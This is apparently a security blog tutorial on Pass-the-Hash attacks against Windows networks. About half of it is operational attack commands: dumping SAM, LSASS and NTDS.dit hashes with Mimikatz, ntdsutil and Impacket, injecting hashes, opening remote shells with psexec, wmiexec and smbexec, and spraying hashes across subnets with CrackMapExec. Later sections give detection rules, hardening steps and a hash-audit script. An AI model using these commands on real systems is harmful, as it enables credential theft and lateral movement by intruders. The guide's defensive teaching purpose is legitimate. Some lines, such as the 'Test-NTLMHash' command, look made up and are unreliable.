Introduction:
Pass-the-Hash (PtH) is a post-exploitation technique that enables attackers to authenticate to remote systems using stolen NTLM password hashes without ever cracking the plaintext password. This attack bypasses traditional password-based defenses and is a cornerstone of lateral movement in Windows-dominated networks, allowing adversaries to jump from a compromised endpoint to domain controllers, file servers, and critical infrastructure.
Learning Objectives:
- Understand the NTLM authentication flow and how PtH subverts it by replacing the password hash.
- Learn to extract NTLM hashes from SAM, LSASS, and NTDS.dit using tools like Mimikatz and Impacket.
- Apply PtH for lateral movement via SMB, WMI, and RPC, and implement detection/mitigation strategies.
You Should Know:
1. Extracting NTLM Hashes – The First Step to Lateral Movement
Attackers must first obtain NTLM hashes from a compromised machine. Common sources include the local SAM registry hive (for local accounts), LSASS process memory (for logged-in domain users), and the NTDS.dit file (for all domain hashes). Below are verified extraction commands.
Step-by-step guide for local SAM (Windows):
- Run as Administrator: `reg save HKLM\SAM sam.save` and `reg save HKLM\SYSTEM system.save`
- Transfer the files to an attacker machine and run `impacket-secretsdump -sam sam.save -system system.save LOCAL`
Using Mimikatz (in-memory):
- `privilege::debug`
- `token::elevate`
- `lsadump::sam` (local SAM)
- `lsadump::lsa /inject` (LSASS, domain hashes)
Extracting NTDS.dit (domain controller):
- `ntdsutil "ac i ntds" "ifm" "create full c:\temp\ntds" q q` (creates a copy)
- `impacket-secretsdump -system SYSTEM -ntds ntds.dit LOCAL`
Linux alternative (post-compromise via root):
Run Mimikatz on Linux via Wine, or use Impacket's wmiexec to run the save remotely: `impacket-wmiexec -hashes :<ntlm_hash> domain/user@target 'reg save HKLM\SAM sam.save'`
These hashes are then used without cracking – the NTLM hash itself is the credential.
2. Pass-the-Hash Using Mimikatz (Interactive & Command Line)
Mimikatz is the de facto tool for injecting a hash into the current Windows session, allowing the attacker to authenticate as the user without the password.
Step-by-step guide:
- Obtain an NTLM hash (e.g., `aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0` for a blank password or a real hash).
- Open Mimikatz as Administrator: `mimikatz.exe`
- Inject the hash: `sekurlsa::pth /user:Administrator /domain:targetdomain /ntlm:31d6cfe0d16ae931b73c59d7e0c089c0 /run:cmd.exe`
- A new command prompt appears with the user's token. Use `dir \\remote-pc\C$` to verify access.
Automated pass-the-hash (no interactive):
`mimikatz.exe "sekurlsa::pth /user:Admin /domain:corp.local /ntlm:HASH /run:powershell.exe" exit`
This technique works because Windows authentication only requires the hash to calculate the NTLM response to the server’s challenge – the plaintext password is never needed.
3. Lateral Movement with Impacket Suite (Linux)
Impacket provides Python tools for PtH without needing to inject into a local session. It’s perfect for Linux attack boxes.
Step-by-step using psexec.py:
`impacket-psexec -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 [email protected]`
Using wmiexec.py for stealthier movement:
`impacket-wmiexec -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 corp.local/[email protected]`
SMBExec (executes commands via service creation):
`impacket-smbexec -hashes :hash [email protected]`
These tools create a semi-interactive shell. For file transfer, use `impacket-smbclient` with the same hash to access \\target\C$.
Practical scenario: After dumping a hash from a compromised workstation, run `crackmapexec smb 192.168.1.0/24 -u administrator -H hash --local-auth` to discover all machines where the hash works. Then pivot using wmiexec.
4. CrackMapExec – Mass Lateral Movement
CrackMapExec (CME) is a post‑exploitation Swiss army knife that automates PtH across entire networks.
Installation (Linux):
`apt install crackmapexec`, or via pipx: `pipx install crackmapexec`
Using PtH with CME:
- `crackmapexec smb 192.168.1.1-254 -u administrator -H 31d6cfe0d16ae931b73c59d7e0c089c0 --shares` (list shares)
- `crackmapexec smb targets.txt -u user -H hash -x "whoami"` (execute a command)
- `crackmapexec smb targets.txt -u user -H hash -M mimikatz` (run the mimikatz module)
For domain accounts (no `--local-auth`):
`crackmapexec smb dc.corp.local -u john -H hash -d corp.local`
CME also integrates with MSSQL, SSH, WinRM, and LDAP, allowing PtH to extend beyond SMB. For WinRM (often open on servers): `crackmapexec winrm 10.0.0.1 -u admin -H hash -x ipconfig`.
5. Detecting Pass-the-Hash Attacks with Sysmon and Windows Logs
Blue teams can detect PtH by monitoring unusual authentication patterns. Key event IDs include 4624 (successful logon) with Logon Type 3 (network) or 9 (batch), especially when the source workstation is unexpected.
Step‑by‑step detection using Sysmon (install with schema):
- Install Sysmon: `sysmon64 -accepteula -i sysmonconfig.xml` (use SwiftOnSecurity’s config)
- Look for Event ID 10 (ProcessAccess) – Mimikatz opening lsass.exe with `GrantedAccess=0x1010` or `0x1fffff`.
- Monitor Event ID 4656 (handle to LSASS requested) with suspicious call stacks.
Command to filter suspicious LSASS access:
`Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; ID=10} | Where-Object {$_.Message -match "lsass.exe" -and $_.Message -match "0x1fffff"}`
Network detection: PtH using SMB generates NTLM authentication without a previous Kerberos ticket. Look for Event ID 4776 (credential validation) where the workstation name doesn’t match the account’s usual source.
Windows Defender Credential Guard (enabled via Group Policy) stores hashes in a virtualized container, preventing them from being dumped out of LSASS. Check status: `Get-WmiObject -Class Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard`.
6. Mitigation: Hardening Windows Against PtH
Microsoft has released multiple mitigations. The most effective is enabling Restricted Admin Mode for RDP and Credential Guard to protect LSASS.
Step‑by‑step hardening checklist:
- Apply KB2871997 (Windows 7/2008R2) or newer OS versions – removes the ability to use PtH for local accounts (but domain accounts remain vulnerable without additional steps).
- Enable Restricted Admin Mode (RDP): set the registry value `HKLM\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin` to 0, then connect with `mstsc.exe /restrictedadmin`.
- Deploy the Protected Users group – members cannot use NTLM authentication; Kerberos is forced.
- Disable NTLM entirely where possible via Group Policy: `Network security: Restrict NTLM: Incoming NTLM traffic` -> Deny all accounts.
- Use LAPS (Local Administrator Password Solution) to randomize local admin passwords so a hash from one machine doesn't work on another.
- Enforce SMB signing (prevents some PtH relay attacks): `Set-SmbServerConfiguration -RequireSecuritySignature $true`.
PowerShell to check NTLM usage:
`Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4624} | Where-Object {$_.Message -match "NTLM"}`
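The LAPS item in the checklist rests on one observation: if the built-in local Administrator (RID 500) carries the same NT hash on many hosts, a single dump authenticates to all of them. The following is an added example, not code from the original post: a Python audit over secretsdump-style SAM output (the `user:rid:lmhash:nthash:::` line format) gathered during an authorized assessment, reporting RID 500 hashes that recur across hosts (the condition LAPS removes) and accounts carrying the blank-password NT hash quoted in section 2. Host names are invented and the non-blank hash values are placeholder hex, not real hashes.

```python
# Added example (not from the original post): audit SAM dumps for shared and blank hashes.
import re
from collections import defaultdict

# LM and NT hashes of an empty password (the pair quoted in section 2).
BLANK_LM = "aad3b435b51404eeaad3b435b51404ee"
BLANK_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# One pwdump-style line as emitted by secretsdump: user:rid:lmhash:nthash:::
DUMP_LINE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)

# Constructed per-host dumps. SHARED and UNIQUE are placeholder hex, not real hashes.
SHARED = "deadbeef" * 4
UNIQUE = "cafebabe" * 4
SAM_DUMPS = {
    "WS01": f"Administrator:500:{BLANK_LM}:{SHARED}:::\nGuest:501:{BLANK_LM}:{BLANK_NT}:::",
    "WS02": (f"Administrator:500:{BLANK_LM}:{SHARED}:::\nGuest:501:{BLANK_LM}:{BLANK_NT}:::\n"
             f"helpdesk:1001:{BLANK_LM}:{BLANK_NT}:::"),
    # A banner line like the one secretsdump prints; the parser must skip it.
    "WS03": f"[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)\nAdministrator:500:{BLANK_LM}:{SHARED}:::",
    "SRV01": f"Administrator:500:{BLANK_LM}:{UNIQUE}:::\nGuest:501:{BLANK_LM}:{BLANK_NT}:::",
}


def parse_dump(text):
    """Parse pwdump-style lines into dicts; banners and malformed lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = DUMP_LINE.match(line.strip())
        if m:
            rows.append({"user": m["user"], "rid": int(m["rid"]),
                         "lm": m["lm"].lower(), "nt": m["nt"].lower()})
    return rows


def find_shared_admin_hashes(dumps_by_host):
    """Map each RID 500 NT hash seen on more than one host to the sorted host list.
    RID 500 is used rather than the name so a renamed Administrator is still caught."""
    hosts_by_hash = defaultdict(set)
    for host, text in dumps_by_host.items():
        for row in parse_dump(text):
            if row["rid"] == 500:
                hosts_by_hash[row["nt"]].add(host)
    return {h: sorted(hosts) for h, hosts in hosts_by_hash.items() if len(hosts) > 1}


def find_blank_passwords(dumps_by_host, ignore_rids=frozenset({501})):
    """List (host, user) pairs whose NT hash is the empty-password hash.
    RID 501 (Guest) is disabled by default and excluded unless asked for."""
    return [(host, row["user"])
            for host, text in dumps_by_host.items()
            for row in parse_dump(text)
            if row["nt"] == BLANK_NT and row["rid"] not in ignore_rids]


if __name__ == "__main__":
    for nt_hash, hosts in find_shared_admin_hashes(SAM_DUMPS).items():
        print(f"RID 500 hash {nt_hash[:8]}... shared by {len(hosts)} hosts: {', '.join(hosts)}")
    for host, user in find_blank_passwords(SAM_DUMPS):
        print(f"blank password: {user} on {host}")
```

In the constructed data WS01, WS02 and WS03 share one Administrator hash while SRV01 has its own, which is what a LAPS rollout should turn into four distinct hashes; the blank-hash check is a cheap addition because the empty-password NT hash is a constant.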
7. Advanced: Passing the Hash in Cloud and Hybrid Environments
In hybrid Azure AD environments, PtH can still work against on-premises synchronised identities. Attackers who compromise a hybrid server and dump hashes of synchronised accounts can move laterally to other on-prem resources, and sometimes to Azure AD Connect for password hash sync.
Step‑by‑step for hybrid hardening:
- Use Azure AD Seamless SSO – does not store hashes on the server; but if compromised, attackers can extract `AzureADSSO` token. Mitigation: rotate the `AZUREADSSOACC` account’s Kerberos decryption key.
- Enable Windows Defender System Guard for LSASS to isolate secrets from the OS.
- For cloud VMs (AWS EC2, Azure VM), disable NTLM on Windows Server images via EC2 Launch Templates or Azure Policy.
Testing PtH in a lab (educational only): On a Windows Server 2022, run `Test-NTLMHash -Hash NTHashTools`.
What Undercode Say:
- Pass-the-Hash remains one of the most reliable lateral movement techniques because it abuses a fundamental design of NTLM – the hash is the credential. Even after a decade of mitigations, many organizations still have privileged accounts with NTLM enabled, making PtH a constant threat.
- Detection requires a shift from “looking for password cracking” to “monitoring LSASS access and NTLM logon patterns.” Tools like Sysmon and Windows Event Forwarding are essential, but the ultimate solution is disabling NTLM entirely – a difficult but achievable goal in modern environments.
Prediction:
As Microsoft pushes towards Kerberos-only authentication and cloud-native models (like Azure Arc and Windows 11’s “NTLM blocking” features), Pass-the-Hash will gradually lose its power inside pure cloud or modern Windows forests. However, legacy systems and hybrid setups will remain vulnerable for the next five years. Attackers will shift to token theft and Kerberoasting, but PtH will continue to be a go-to technique in environments where NTLM cannot be retired – especially in OT, healthcare, and finance sectors with mixed OS versions. Red teams must master PtH, while blue teams must prioritize NTLM disablement and Credential Guard deployment as a critical security baseline.
Reported By: Lateral Movement – Hackers Feeds